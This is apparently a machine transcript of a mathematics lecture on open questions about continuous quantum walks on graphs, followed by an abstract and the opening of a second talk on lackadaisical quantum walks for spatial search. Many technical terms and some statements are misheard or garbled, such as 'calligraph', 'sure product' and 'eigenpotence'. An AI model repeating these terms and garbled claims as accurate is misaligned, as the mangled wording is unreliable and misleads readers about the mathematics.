of those work. So, it's a useful tool. And as I said, the main focus is one of the basic questions is simply if you've got a graph, is there perfect state transfer between two vertices on this graph? Okay, and that's in some sense what I'll be talking about for the next talk. Now, at the moment we have one example of perfect state transfer, and it was easy, which is good, but it's just the k2, the graph on two vertices. And so, if we really want to have a meaningful discussion, we'd like to know there are more examples. Okay, and so I'm going to provide these examples. Now, there's two ways of looking at this, and for the graph theorists, it depends on this construction. Now, this is a standard product of graphs, and I'll give you a picture in a moment, but the idea is that I'm going to construct a new graph from two input graphs. The vertices in the new graph are the order pairs of vertices from the graphs I started with. So, now I've got these order pairs, so that's the Cartesian product of the vertex set. When are two order pairs going to be adjacent in the new graph? Are they going to be adjacent if they agree on the first coordinate and the second coordinate are adjacent, or if they agree on the second coordinate and the first coordinate are adjacent? Now, you can think about that while I'm sort it out, but the best thing is just to stare at the picture. So, this is the Cartesian product of P4 with itself. So, when you draw the Cartesian product, you have vertical, if two graphs x and y, you have vertical copies of x and horizontal copies of y. So, it's perfectly straightforward. It's a standard product in graph theory. The reason it's relevant, this is something that was noticed by Christandl Lotto in the original paper, if you're looking at the transition matrix for a Cartesian product, it's the tensor product of the transition matrix of the factors. So, you could think of it on the left-hand side, you're thinking of a quantum walk on the Cartesian product. Right-hand side, you've just got two independent quantum walks on the factors. Okay, and so this means that very quickly you can get a bunch of examples. The standard example here is, well, I started with K2. That's the only graph I got, so I'm going to start taking Cartesian products of K2 with itself. I'll call that Cartesian powers. Okay, now the de-Cartesian power of K2 is just the d-dimensional hypercube. I'm going to do this a little exercise, but it's not hard. And because of this relation here between the Cartesian product and the tensor product, you deduce that, well, you can certainly write the transition matrix for the d-cube as a tensor power of the transition matrix for K2. And as a medi-consequence of this, that at times pi and 4, pi and 2 and pi, you get respectively uniform mixing, perfect state transfer, and periodicity on the d-cube. So, on the d-cube, in particular, you get perfect state transfer between pairs of vertices and the d-cube, which is the d-dimensional distance, which would be d in this case. Okay, I'll say one thing. It's not only going to clear why the uniform mixing is occurring. In many of the examples, what happens if you do have perfect state transfer, then at half the perfect state transfer time, you get uniform mixing. Now, we have many examples of that. There are also situations where it doesn't occur, but we don't really know, we don't have any sort of nice natural explanation for it. So, the point would say, uniform mixing, well, who cares? Well, you could say it's a nice way of generating a uniform distribution, but the other issue is that it does seem to go along with perfect state transfer in many cases. So, it's worth keeping in mind. So, the point there is to give you a bit of background and get used to looking at my notation. So, now I want to go on to the questions that I'm interested in. Now, these are a bunch of open questions that have come from our work over the years, and I'm going to start with the perfect state transfer. Now, this is simple enough to state. If you have perfect state transfer at some time and you write things out in objective form, that tells you U of T applied to the Keta is going to be a complex scalar times K to B. Straightforward enough. And in all the examples we have of perfect state transfer, that phase factor is a root of unity, gamma to the n is equal to identity for some n. Now, this makes, if I knew that was true, this would make life easier in a lot of calculations. But I don't know it's true. I can't prove it. So, that's one reason why it's interesting. The other point is that we have a reasonable grasp of when perfect state transfer occurs, but in a certain sense you can say, well, we've got a couple of collections of methods. We've got this Cartesian power trick, and the kind of quotient trick, and so you get a bunch of perfect state transfer by using those two tricks. But in those cases, you're going to get the gammas of root of unity. Now, the question is, are there more interest or more varied ways of getting perfect state transfer? Now, if you do that, it could be a bit hard inside, just as new or not. But what I'm saying is, if you could find a perfect state transfer, and that phase factor is not a root of unity, then it's different from anything we already have. So, it's a fairly simple test. And the third common I should make here is, okay, it was way in roots of unity, so this is bringing in number theory, which I don't make some physicists nervous. At some point, from my point of view, it's interesting because working with quantum walks, the mathematics is a mixture of linear algebra and number theory. And actually, you get some fairly deep number theory at times. And so, this is a baby example. In this case, I'm just asking a question. Now, you can argue that perfect state transfer is unusual or rare, and the first theorem I'm quoting there is evident in favourites. So, it says, if you fix an integer k and you look for connected graphs where no vertex has more than k neighbours, then only finally, many of those graphs admit perfect state transfer. So, you know, this is the same, if I would put it on the ordering, but you can do this as saying that perfect state transfer is not common. Okay? Now, that's fine. I have a suspicion that something stronger is true. So, I'm putting restriction on the maximum valency of the vertex. And so, the idea is, well, can I weaken that? So, one way of weakening would be, instead of saying the maximum valency of the vertex, I could say provided the average valency is not too large. Okay? Now, the reason I want to prove that, so the, well, a canonical example, if you have a tree, the average valency of a vertex is two, and you can't get much more than that. Now, trees are interesting at the point of view of state transfer because they're networks, and they've got the minimum possible number of edges to be connected. So, questions about trees are of some interest. Okay? If you want to have a network, then trees are a good place to start. Now, the question simply is, we don't have any examples of a tree with more than three vertices where perfect state transfer occurs. The graph K2 is a tree, and the path on three vertices is a tree, and they both have perfect state transfer between their end vertices. Okay? Well, we have no tree bigger than that. And I suspect that there aren't any more, but I don't see any way of proving it. So, I've got some more refined questions that might be a bit more accessible, but the, and, well, the situation is a little different when you come to a past here, but I'll come to that later. So, instead of asking for the average degree, I could simply state question terms of the diameter, the maximum distance between two vertices in the graph. So, we've got the path on two vertices, and the PST, that's got diameter one, the path on three vertices, got diameter two, but I'm saying it's possible if the diameter is large enough, you can't get PST. And it's possible that might be easier to prove. So, I raise this as a question. Now, the more general question would be, well, the big question would be to prove that if you have a positive real number C, there's only five-line-unit mini-connected graphs with average valency in most C on which perfect state transfer occurs. Now, that's harder than the tree question, so this is the general question, and as I said, we've thought about trees for quite a long while and not made any real progress. So, yeah, so that's that. Now, when you're working with continuous quantum walks, I said I've been using the adjacency matrix, but there are a number of other matrices you could use, and one of the most common alternative would be the Laplacian. And so, I've just defined the Laplacian here. So, I take my graph, I write down the diagonal matrix whose ith entry is the valency of the i-thodex, and the Laplacian then will be a diagonal matrix minus the adjacency matrix. Okay, and so then for the transition matrix, you replace the adjacency matrix by the Laplacian. Now, generally speaking, nothing changes qualitatively when you go from the Laplacian to the adjacency matrix. Okay, the Laplacian in some senses is more natural because if you want to think of it as a quantum walk, as an analog of a classical continuous walk, then the Laplacian is the right matrix. But in practice, it's not just me. People generally seem to work with adjacency matrix, and if you do calculations or you start looking at examples, you run through the graphs on nine vertices and see what's happened, you discover that by and large, data doesn't seem to change that much depending with the use of Laplacian or the adjacency matrix, but there is one important difference. The Coutinho and Loved proved that for a tree, at least three vertices, the continuous walk with Laplacian simultaneous does not emit per-state transfer. And it's fairly short proof and quite elegant. And so it makes it doubly annoying that we can't decide what happens with adjacency matrix. And as I said, there's by and large, you know, the proportion of vertices that graphs that have PST with Laplacian is not that much different from the proportion of graphs that have PST with adjacency matrix. It's not clear mathematically that there's a huge difference, but there is this result. Lua's not the graduate of the time when this is done. So that's a per-state transfer. Now, the natural question for a graph series is to ask, well, I'm going to have per-state transfer. I've got these two vertices, A and B, and I get my PST from A to B. Now I ask the question, well, what properties does that mean that A and B must share? I mean, if I want to find graphs with PST, the more restrictions I have on the possibilities, the easier it is to identify which graphs for which graphs it occurs, which graphs it doesn't. So, I mean, a simple question you can ask, if I have per-state transfer from vertex A to vertex B, do they have the same valency? So this is going to lead to what I call cospectrality, but we'll get to that in a second. This is a little calculation. What this is showing is if you have per-state transfer from vertex A to vertex B at time t, then at time t, you would also get per-state transfer from vertex B to vertex A. And so that means you run it things for twice that time. You would get transfer from A to B back to A, so you'd have periodicity at the vertex A. And this is how periodicity and PST are related. So the point is you... So the transition matrix is swapping ket A and ket B, and if I don't want the phase factors, I can suck them into the transition matrix, and so I then have a matrix, an entry matrix, gamma inverse U of t, that's swapping ket A and ket B. So this is a consequence of the definition of per-state transfer. It's a property of the two vertices. Now, what does this tell me graphically now? In graph theory, we have this... Well, you can ask questions about the spectrum of the adjacency matrix, but here I've got a fixed graph, and I've got two vertices, A and B. I'm going to say those two vertices are cospectral. Well, usually I would say that if the graph I get from X is from X, white leading A, as the same carriage polynomial is a graph I get from X, white leading B. So the graphs X drop A and X drop B are cospectral. They have this adjacency matrix that's similar. Now, that's... But the... Because of the previous slide, I know that if I have to take state transfer, then U of t... Well, U of t is a polynomial in the adjacency matrix, so it commits with A. And it sends A to B, and it's... Well, U of t has to have a gamma inverse U of t, and so it does both those things. And gamma inverse U of t squared is the identity. And so this could be taken as a definition of cospectrality. So the one way of thinking of it, which if I'm talking about graphs and similar vertices, I'd be thinking in terms of automorphisms, which would be permutation matrices. And so you might look for an automorphism which maps vertex A to vertex B. That would be a permutation matrix which sends A to B. So a graph theorist is implementation matrices. But for a physicist, you're thinking in terms of Hamiltonians, and you're thinking of symmetries of Hamiltonian, and you only require those to be unitary or orthogonal. Okay? And so in a sense, this Q of t is actually giving you the symmetry, but this corresponds exactly to this graph theory notion of cospectral. And so the conclusion then is that, well, this is a good idea, you know, to protect myself here. So it's easy enough to construct cospectral vertices. You take two copies of graph and join the same vertex in each copy. And then the vertices you join are cospectral. So whenever there's a symmetry in the graph swapping two vertices, those two vertices go spectral. One of the things this example here shows is you can get cospectral vertices where there's no symmetry in sight. There's no graph theory symmetry. Now, in terms of, if I go back to the more general definition I was giving in terms of the Qs, there is an orthogonal matrix which swaps Q and QV, and that'll be other nice things. So, you know, cospectrality is a little strange. The other point is it's, well, reasonably straightforward for graph theory. If you know the vertices of cospectral, they will have the same valency and a bunch of other properties. Okay? So cospectral vertices occur, and they're not always occurring in places that you expect to see it. And so the point then is if I have a vertex state transfer, then the vertices involve the cospectral in the sense I just described. Now, it turns out that's not the full story because in that example I just gave you with that tree there, those two vertices are cospectral, but they won't have vertex state transfer. But the other point is that having PST gives you something a bit stronger than in cospectral. And so I've written up another definition. Actually, I haven't got to it yet. Let's go back a second. Yeah, okay, I see what the problem is. What I want to do is define strongly cospectral like in the title of the slide there. Okay, so this is a strengthening notion of cospectral. And so I've left out strongly in the first line of the definition there. So, D strongly cospectral. The first three conditions are the same as I had on the definition of cospectral, but now I've added a fourth condition. I want Q to be a polynomial adjacency matrix. Now, that's something I get when it's like state transfer because as I said, U of T is a polynomial adjacency matrix. So, as interesting as we worked with cospectral vertices, I showed you that tree that Schwenke used back in 1973. That was long before people were thinking about quantum computing. So, we were thinking about cospectral vertices. What happens in the quantum walks? There's something stronger relation. We get this strongly cospectral. So, there's a sharpening, which is not something I would have come across graphically. But by thinking about these walks, I get this new relation. And the upshot is that vertices that are related by perfect state transfer must be strongly cospectral. Now, to answer the obvious question before you ask it, that's not enough. It doesn't force PST. I've threatened before that in this area of mathematics, you need linear algebra and number theory. And being strongly cospectral is truly a linear algebra condition. So, it's not enough. In terms of examples, it is true that if you have a graph and the eigenvalues are all simple and two vertices are cospectral, then it's strongly cospectral. So, that tree I drew with the two vertices you and me, they would be strongly cospectral. You'll see another example in a moment. So, here's a construction I referred to before. I take two copies of the same graph and then join in corresponding vertices in each. So, I've used a and b here to avoid some confusion, but I got picked the same vertex in copy of x and joined them by an edge. That's a graph. And you can show that if those two vertices a and b, they will be strongly cospectral. This is a simple way of getting strongly cospectral vertices. And so, now you have the interesting question. Is there a connector graph where x has more than one vertex of that form and you do get perfect state transfer between those vertices? Now, as I said, the problem becomes enough when you come to work it out, involves the number theory. I have to make x have at least one vertex because otherwise I might just get k2, which does have perfect state transfer. But the question is, can I use any bigger graph? Now, it's a fairly simple situation. And you can sit there and do computations and stuff, but I don't have any real idea and any nice, really nice examples. So, that. So, I want to lead up to a... If perfect state transfer is rare, you might start thinking about, well, maybe there's some relaxations which are still useful and I'm leading up to that. But I'm also giving you a somewhat different viewpoint, which I find very useful. So, I'm going to work with density matrices and I'm going to have my quantum walk U of t given by some graph. And now I'm going to look at the... all the matrices U of t for t and r. Now, that set of matrices is a group. It is a subgroup of the entry group. Okay? And so, when you look now, look at the set, U t, d sub a, U of minus t, that's all the density matrices you can get by applying in your quantum walk. So, that's the total image of the quantum... everything that can appear on the quantum walk. Now, that's an orbit. So, you've got a lee group acting on something. So, you're in a very controlled situation. And now, if you think about these terms, so for each density matrix, d sub a, I've got an orbit. I get PST from a to b if the orbit of d sub a contains d sub b. So, it's in that sort of a geometric point of view, which is a very simple condition. You say, is this in the orbit at that point? If it is, you've got the extra transfer. You don't. That's simple enough. So, a perfect state transfer is in the same orbit. So, the generalization is more one-in-a-way. I call it pretty good state transfer. The thing I have pretty good state transfer is made to be if d sub b lies in the closure of the orbit. Now, the issue here is this, in fairly simple case, you can think of the... the orbits are sitting on the torus. And you'll see pictures on the torus of curves that go around in a dense. And so, that orbit can look like that. If you're familiar with lee groups, this is all triviality. But the... So, the statement is that if d is in the closure of your orbit, then you're getting what we call pretty good state transfer. Now, you can express this in simpler terms, and it simply says that there's a... you pick your epsilon positive. There's a time t, such that u of t, d sub a, u of minus t is within epsilon of d sub b. So, you're getting approximate, or pretty good state transfer. I can't get perfect, but I can do pretty good. Okay? Now, this is a... Okay, it's a natural enough generalization. It's occurred to a number of people. I won't go into that. I just want to give you one result, which gives you some idea of the complexity, and you'll see some of the numbers here coming in. A group has proved we're looking at pretty good state transfer between the n vertices of a path. Now, for perfect state transfer, you get PST between the n vertices of path on two vertices and the path on three vertices, and no more. And it's not spectacularly difficult to prove, but it's not trivial. It's like a civil-pated. So, pretty good state transfer situation is a lot more complicated. I have a path on n vertices, and I'm asking for PgST between those n vertices. Then it occurs if I need one of those three conditions to hold. Number of vertices plus one is a power of two. Number of vertices plus one is a prime. Number of vertices plus one is twice a prime. Now, this is purely a number theory condition. Okay? And physically, it's quite weird, because it's a little bit hard to imagine a system where the behavior is going to depend on whether you're dealing with a prime or not. But, I mean, this is what happens. Okay? So, now, these results have been extended, but the issue is, okay, it does occur. The problem physically is you may have to wait a long while for it to happen, but I won't go into that now. But what I'm saying is you do get PgST, but it depends on number theory. And I said that, so we're going. And so, now, I can ask another question. And for which character graphs do I get pretty good state transfer between those two base vertices? Now, this you can. I didn't draw the picture. If you take the star, one vertex with m neighbors, and use that for x, then if 4m plus 1 is a perfect square, you get PgST, and if it's not a perfect square, you don't. So, again, it's a number theory, but it's not a... It's interesting. The previous conditions were the early conditions in primes. This is using... It's turned on whether something is a square or not. So, it's a different flavor of number theory, but there's still a number theory. So, mathematically, this is quite surprising. The other point is... Well, I mentioned Gabriel's name before, and he's in the computer science department, so he asked the question, is it possible to determine in polynomial time whether a graph admits pretty good state transfer? Now, we can. I showed that you can give us a graph. Then in polynomial time, you can decide if there's Pst between two vertices or not. We don't know whether you can get... How hard is to determine PgST? I think Gabriel has a hope that you can do it in polynomial time, but I'm more skeptical. So, the issue is with the Pst, there is an option to tell us if it's going to occur, it must occur within a sticked up and down on the time, and so in a certain sense, that narrows things down. But for the PgST, we have no idea at this point. Okay. So, excuse me. The next topic is what I'm going to call averaging. Now, the one way of motivating this for me is that if I construct some natural parameter or natural matrix depending on the quantum walk, then I've got a graph invariance. I've got a new way of... a new property of a graph, and I'm going to define the distance of that relation between properties of the graph and properties of this invariant. Okay. So, the invariant I'm going to introduce now is what I call the average mixing matrix. So, remember that the mixing matrix entries are just the squares of the absolute values of the entries of the transition matrix. Okay. So, it's a non-negative matrix with rows and columns, something to one, and I'm going to define the average mixing matrix the way I've just done it up there. And, or you can dig out more from the references from that. Now, the two comments. The first thing is that averages like this appear, well, in a gothic theory, in particular in work of von Neumann, and there's always mice to be able to cite von Neumann when you're trying to talk to visitors. But so, not exactly this one, but something very similar. Now, of course, the other question is, any fuel can write down a limit like this, but does it exist? Now, so, we can take care of that because we can compute it another way and it gives us more information. So, I've got my adjacency matrix, A, it's been there all along, and now it's got a spectral decomposition. Okay. And so, the eigenvalues are theta r, and the eigenpotence, the projections, and the eigenspaces are e sub r. So, the U of t has a spectral decomposition. It's got the same eigenpotence, and the eigenvalues are e to the i t theta r now. Okay, so we can write out, we've got the spectral decomposition for U of t. And so, now I can write out a formula for m of t. And so, I get something which looks like a spectral decomposition, although it's not, but it's still a linear combination. I've got things like, I've got e to the i t theta r, minus theta s, this is my scalar, that's my linear combination, and it's an linear combination. Matrix, these matrices are the sure products of E r with E s. So, this is the bad student's product of two matrices. You multiply the identity to the identity. So, that's all I'm doing there. So, I mean, I'm just using linearity. I get to this. Now, this is a sure product of two positive semi-definite matrices. And so, for example, there's a theorem of sure that says that positive matrix is always positive semi-definite. Not that it really matters. Now, the point is I don't really care at the moment about m of t. I was interested in this average. When you do the averaging at simple calculus, the off-diagonal terms all go away. And so, the average mixing matrix is just the sum of the sure squares of the idempotence. Okay. Which is a percfully reasonable concept, but nobody thought about looking at this before. We looked at that looking at questions about quantum walks. Now, let's do a very simple example. If you take the complete graph on m vertices, then it's adjacent. Well, I use graph theorists, and we'll use j, in other case, j for the all-ones matrix. In this case, square. So, the j-sency matrix of complete graph is just j minus the identity. Okay. And you can look at very quickly that the idempotence in the spectral decomposition of the j-sency matrix of the complete graph are one on n times the all-ones matrix and the identity minus one of n times the all-ones matrix because there are only two eigenvalues and the idempotence has to sum to the identity. And so, once you work out the first idempotence, you've got the second. And so, therefore, with a little bit of work, you get the expression for the average mixing matrix for the complete graph. Okay. So, it's one minus two on n times i plus one on n squared times j, which has got somewhat surprising consequence. So, for a large complete graph, that average mixing matrix is pretty much the identity. Now, that's a little weird already, but it leads to something even stranger, which was, you can see in the law. The average mixing matrix does have a number of special properties. The sure square of a positive semi-definite matrix, positive semi-definite, and so, M hat has a sum of positive semi-definite matrix. So, it's a positive semi-definite. So, that's straightforward. This is, I guess, you would call it positive rather than positive semi-definite. The entries of that matrix are rational, which is not obvious. And the other kind of make is that two rows of the average mixing matrix are equal, if any, if the corresponding vertices are strongly co-spectral. So, all these things are tied together. So, it's a useful matrix. You can show that if the rank of that matrix is one, and the graph must have at most two vertices, and a bunch of us have spent a lot of effort looking at the case of what happened to rank two, and the question is whether the infallimini graphs of the average mixing matrix has rank two. I don't have a clue. I guess it's a short answer. But so, it's a fairly strong restriction, what I would have thought, but we have a number of examples, just enough to make it complicated. But I want to go back. Another property of the average mixing matrix, I said the fact that the average mixing matrix, the complete graph was close to identity, was weird, and I want to drive this home. It's not too hard to prove from definition that the, now I'm using the curly greater than or equals to denote that the difference of the two sides is positive. So, I'm saying that I minus the mixing matrix is positive and definite. And, M of t minus twice M hat minus I is positive and definite. And now for the complete graph, this yields that the M of t, M of t minus the stuff here is positive and definite. Now, that means that the diagonal entries, if A is curly brackets greater than or equal to B, then the diagonal entries of A must be greater than or equal to the diagonal entries of B. This is the fact about positive matrices. So, this statement here tells us that the diagonal entries of M of t are bounded below by this. So, I said that M hat was close to identity, but now I'm saying it's a lot stronger. Now, I'm saying that M of t is close to the identity. And this is kind of bizarre. You're trying to walk on the complete graph, and you measure it sometime, see, with very high probability you're on the vertex, you start with that. Okay. So, the now... So, I'll say a family of graphs is sedentary if there's a constant c, so this happens. And so, given that definition, I thought it's much up here that the complete graph is sedentary. Now, I have many other examples. The issue is that while I need my graphs to have a relatively high valency, and so a concrete question is whether there's a sedentary family connected to cubi graphs where every vertex has got valency three. So, I've got some work on this. I can give you examples other than complete graphs. So, there are examples of sedentary graphs. And one feature, as I said, is that generally for those graphs, for those families, the valency is increasing within. So, the question is whether you can do... what you can do in a constant valency case. Okay. Good. So, my final group of questions is related... I was talking about, way back on one of the first slides, about uniform mixing. So, the uniform mixing occurs if there's a time t, such that all entries of yours to have the same absolute value. Okay. And the... now, the very end of this that you can ask for that, you might also say, well, there might be situations where if I started a certain vertex and measured a time t, that all outputs were likely. That would be saying that a certain row of the mixing matrix had all entries equal, that would be one over n. So, that would be local uniform mixing. So, we've got these two variants, the uniform mixing and local uniform mixing. And so, if you have local uniform mix at each vertex at the same time, you have uniform mixing. Right. So, now, there's a long slide here, giving you a summary of what we know about it. I showed you earlier that the complete graph... or path on two vertices admits uniform mixing at time pi and four. And so, the hypercube also makes uniform mixing at time pi and four. And as I mentioned before, there are many cases where we have... if we have PST at time t, then we have uniform mixing at time t on two, and we don't really have an explanation to why this would happen. The complete bipartite graph... so, this is one k13, so you have one vertex joined to three others and no other edges. That graph admits uniform mixing. And the Cartesian powers work too. And this is the observation that's due to Harmony's aunt. And this is the only family of graphs which are not regular, where I know that we have uniform mixing. We do get local uniform mixing in other cases. On the bottom there, for k1n. If you're going to get uniform mixing, you expect the vertices of the graph... the simplest one, the vertices of the graphs are all similar. And the easy way to do that is when for graphs there is to say, let's assume that for any two vertices, we take one vertex to the other. This would be a so-called vertex transitive graph. Now, looking at examples of vertex transitive graphs, the simplest examples, the simplest not entirely triple example, will be the cycles. Okay. And now the only even cycle admits uniform mixing is c4. And the only cycle of primal links admits uniform mixing is the complete graph on three vertices, the triangle. The... it's somewhat annoying. It's unlikely that the odd cycles admit uniform mixing, but we don't have anything like a proof at this point. And so that's the first question. So which odd cycles admit uniform mixing? Now, Gabriel and Kristal said they looked c9 and ruled that out, so probably the first open case is 15. Now, the question would be, is there a graph other than k13 that's not regular admits uniform mixing? And so a related question would be, which trees admit local uniform mixing? Now, to finish off, I just want to... So as I said, if I want to be... well, I want to state a couple of conjectures due to Natalie Mullen, if I'm looking for uniform mixing, it's natural to focus on graphs that are vertex transitive. And so what I'm doing here is giving you an infinite way of constructing vertex transitive graphs. So I want to do it like I start what I call a calligraph. And it's really, really simple. You start, okay, I want to get a... I'm going to start with some group, a finite group normally, and I pick a subset of the element which I'm calling script C. And so the vertices in my graph are going to be just the elements of the group. So I'm drawing a... because I think a graph is vertices, the elements of some group. And now when I define a graph, I've got to tell you what the vertices are, and then I've got to give you the adjacency rule, the way of telling whether two vertices are adjacent. And so the rule is that g... little g will be adjacent to h if hg inverses in my set script C. Now, because I want to get the graph and not something slightly weird, I want to assume that my set script C doesn't have the identity, and if it contains an element, C, it contains the inverse. But so anyway, so you choose it carefully, you get a graph, and these graphs are always vertex transitive. There are vertex transitive graphs you can't get in this way, but that's not going to matter. And well, the simplest example really is to take the... stick the group of order n and just take the elements one and minus one, and then the graph you construct is just the n-cycle, but we don't need another description of the n-cycle. And so, for my student, Natalie Mullins got two conjectures. And again, see, the first one's number theory. So if the graph emits uniform mixing at time t, then e to the it is a root of unity. And the other thing she conjectures is that if n is greater than 5, then no connected calligraph for z, n to the d emits uniform mixing. So we do have uniform mixing on calligraphs to z2 to the d and z3 to the d, and probably z4 to the d. I don't think we ever really got to that, but it's likely for z4 to the d. But so, if the answer, the first question sort of helps you, if we knew this was true, then it would be a lot easier to decide the second question. That's probably the way of doing it. And thanks for your attention. That's the end of the talk. Thank you. So questions. Oh, hi. You talked about uniform mixing and perfect state transfer. Recently, we wrote a paper about something quite opposite. We looked at zero transfer, which means during this quantum work, some notes would be completely hidden. The techniques you applied here, do you think it would apply to zero transfer? Tenner time on has done some work on this. And we've thought about a little bit. We actually do have some results. It's not my terminology. Tenner says a vertex is everness, and there's a time to you which that entry of the matrix is zero. And so we have a few results about this example saying that in these cases there are. But it's fairly easy to write down examples where you do the plot and you convince that this will be zero at these intervals, and we don't have a proof. So for example, one example, to use this off, you look at the cycle on five vertices, you're going to do transfer on that. Okay, so you work at U of t and you plot it. Now I want to look at the one, two entry of the cycle. Now it's a complex number, but I can plot it in the plane. And so I get a nice plot. It looks like a five leaf clover. And you let it fill out. Starts at zero. And I shouldn't have done it. We don't know whether it's ever zero again. So these questions are difficult. Thank you. Yeah. It's a pretty good. Yeah, stay transfer. So. Do you have some examples of the graph? The time can be estimated. There exists a. Essentially what's driving it is what creates recurrence there. Okay, which means now, I mean, I know people in statistical physics, you know, cite this and quote it. I'm not sure what the at the average of the average working physics to point out the way serum is because the waiting time is very large. So for the path on three vertices, you're getting perfect state transfer. You know, small model of pie. I'm going to get the right number now for the path on four vertices. You do get pdst between the end vertices. But yet to get to be with one percent accuracy, you have to wait to be like 800 pie. So and the basically the waiting time. So the waiting time is going to be you're going to pick a net slum ball around your target. Now it's an epsilon ball on a high dimensional torus. And so the waiting time is one over e to the dimension. And this dimension is ten binomial theory for the path on four vertices. It's just two as you go up, it increases the sort of half the length of the path. So it's your waiting time is getting very bad very quickly. So that's the bad news. Now there's an interesting paper by Fitter, which we're being trying to understand. Fitter and a few others which we're trying to understand. We're seeing some say that if you can modify the graph a bit and speed things up. But he's writing as a physicist and we're not quite, we don't quite follow the mathematics. And so it's, I'm not going to make a precise statement. And that's a question. Did you consider pretty good uniform mixing? Yeah, we have. It's in Natalie Mullen's thesis. So it's kind of, yes, so you can't get uniform mixing on the five cycle, but you can get uniform mixing to with any degree of precision, which is kind of interesting. Because sometimes people think if they can do something to pretty good, after precision, I should be able to do it exactly. But for the five cycle, you do not get uniform mixing. Tino and his students proved that, but you can get pretty good approximation. Yeah. Do you have more questions? I have a question. It's a related to the, it's a question. Is this some of the, is it you can, yeah, you are roughly considered that pretty good uniform mixing. Is that you, you say that's a little bit considered. Is there some of the relationship in the Kraschka case, Kraschka uniform, pretty good type uniform mixing on the graph in the X-panda graph, I think. Sorry, I'm going to, no. And that's some of the X-panda graph. And that's some of the uniform mix, pretty good uniform mixing. Well, the problem is in the classical case, you always get mixing. I mean, if you have a classical connect to graph, the long-term state is uniform. That's very likely. So classically, you always get uniform mixing. So it doesn't have to be an expander. You just have to be connected. I see. Yeah. Okay. The quantum case, you don't. It's just why the quantum case is interesting. Okay. Yeah. More questions? If not, let's thank Chris again.
|
Continuous quantum walks are of great interest in quantum computing and, over the last decade, my group has been studying this topic intensively. As graph theorists, one of our main goals has been to get a better understanding of the relation between the properties of a walk and the properties of the underlying graph. We have had both successes and failures. The failures lead to a number of interesting open questions, which I will present in my talk.
|
10.5446/54098 (DOI)
|
Thank you for the introduction. Thank you to the organizers for inviting me. So I'll be speaking about some work on spatial search. So it's an algorithmic application of quantum walks. And the type of quantum walk I'm going to be using is something called a lackadaisical quantum walk. So lackadaisical is just a synonym for lazy. So it's a lazy quantum walk. So I'll start by introducing what this is by reviewing what you all have seen many times in an expert's in, which is the 1D line. So talk about a normal random walk and then a normal Hadamard quantum walk. And then what makes a lackadaisical quantum walk different? After that, we're going to look at some search problems. So we're going to start with Grover's problem, which is search on the complete graph. And then we're going to look at search on the 2D grid. And then we're going to look at some recent results with one of my undergraduate students on search on the complete bipartite graph. If you want to ask questions as we go, feel free. I'm used to teaching undergrads. So you can just raise your hand or if I don't see you, just shout out or something. All right. But first, before we get to that, it seems like no one knows where Omaha, Nebraska is. So I thought I'd start with that. So where is the state of Nebraska? You want to see it? I start to see some knots. People are picking it up. Yes, it's right there in the middle, in the Midwest, above Kansas. And Omaha is on the eastern border next to Iowa. So that's where Omaha, Nebraska is. Now you know. So Omaha has a population of about half a million. If you count all the towns around it, it's a population of about one million. What is Omaha known for? Well the biggest thing is Warren Buffett. So Warren Buffett is a legendary businessman and investor. So I think he's the fourth richest man in the world. But he's very generous. So he's the billionaire who started this challenge to other billionaires to donate most of their money when they pass away. Yes, so his company is Berkshire Hathaway, which I think is the fourth largest company in the world. And every year they have their shareholders meeting in Omaha. And so tens of thousands of people from all over the world convene onto our mid-sized city for this shareholders meeting. We're also famous for the College World Series, which most of you wouldn't know. Does anyone know what sport this is? How about that? Baseball. Baseball. So yeah, it's American. So the college baseball championship takes place in Omaha every year. And then finally, we actually have a very good zoo. So the San Diego Zoo and the Omaha Zoo actually go back and forth as the number one zoo in America, which you wouldn't expect in Omaha. All right. So let's get into the research. So if you have a quantum walk on the line, as you know, what you do is if your walker starts in the middle, what he does is he flips a coin. And if it's heads, then he faces left. And then if it's tails, he faces right. And then after that, he takes a step. And again, you flip a coin. You face left or you face right. And you take another step. And if you repeat this process, as you know, many times, you get this shape. So this is a binomial distribution. And the spread of this is quite slow. It scales as the square root of the number of steps. OK. So you guys know this. And just to be clear, this is using the Hadamard coin and the moving shift. So if we look at a, sorry, that was Costco, now for the quantum. So you see the quantum. So it's the same idea. So what we'll do is when you flip the coin, we'll flip a quantum coin. And so now the result can be a superposition of heads and tails. So you point left and right. And then when you take your quantum step, you step in a superposition. So now you're in multiple locations at once. And you repeat that so that you're in a superposition of heads and tails and a superposition of positions. And so if we do that a bunch of times, well, here's the classical result we just had. And now the quantum result, as you know, is this two-peak behavior. And the spread of this is much faster. So instead of being stuck around here, you're more likely to be far away at the peaks. And the standard deviation of this scales linearly in time. So it's a quadratically faster spread. And this is some intuition as to why quantum algorithms based on quantum walks might be faster, because it can spread more quickly. This is the part that has a Hadamard coin in the moving shift. So the moving shift means if you're pointing left, or this is your right, if pointing right, you take a step, you just continue pointing right. So that's it. You just move left or right. All right. So let's talk about lazy random walks. So classically, first, lazy random walks are actually really useful algorithmically. So nothing quantum here. And just to give you some intuition for why. Just consider a bipartite graph like this. So a bipartite graph has two vertex sets. So there they are circled. So you see, in each set, they're not connected to each other. They only connect to vertices in the other set. And let's say we do a classical random walk where we start with some probability distribution over the left set. So if we take a step of the walk, where do we end up? We end up in the right set. We take another step of the random walk. Where do we end up? We take another step on the left set. And we see just even with a classical random walk, you only are in one set or the other. You're not over both. And so if you want to be in a probability distribution over both sets, what you can do is you can use a lazy random walk. So you have some probability of jumping and some probability of staying put. And if you do that, then you'll get some probability distribution over both sets. And you might imagine some situations where this might be useful so that you don't just get trapped in one set or the other. And so classically, there's a bunch of applications of this that I'm not an expert in, but there's some citations if you want to look things out. And so a while back, I was thinking about whether or not there were some quantum analogs of this. And so Andrew Childs came up with one in 2010, which he called a lazy quantum walk, which is quite complicated. And so when I came up with mine, I needed a different name because lazy quantum walk was already taken. So I just looked up, what are synonyms for lazy? And I picked lackadaisical quantum walk. This is kind of a fun word, even if it's hard to say. So lackadaisical quantum walk. And so the idea here is very simple. All you do is you add a self-loop at every vertex. So on the one-dimensional line, it would look like this. So you have three directions now. So if you're at the origin, you can point left, or you can point right, or you can point to yourself so that you stay put. And so then if you walk, you can walk left, you can walk right, or you can walk in place and not move at all. And these are weighted edges. So that way you can adjust how lazy the walker is. So if L is bigger, then it's going to be more lazy. You're going to preferentially stay put. And if it's smaller, you're less lazy. All right, so one of the things with this is if we have three directions now, we can't use the Hadamard coin, because that's only for two directions. And the coin that we use in search algorithms is called the Grover coin. And so let me start by reviewing the Grover coin on an unweighted graph. And so let's look at this left, right, and pointing to yourself with no weight. So there's no weight L here. So everything has weight 1, if you will. 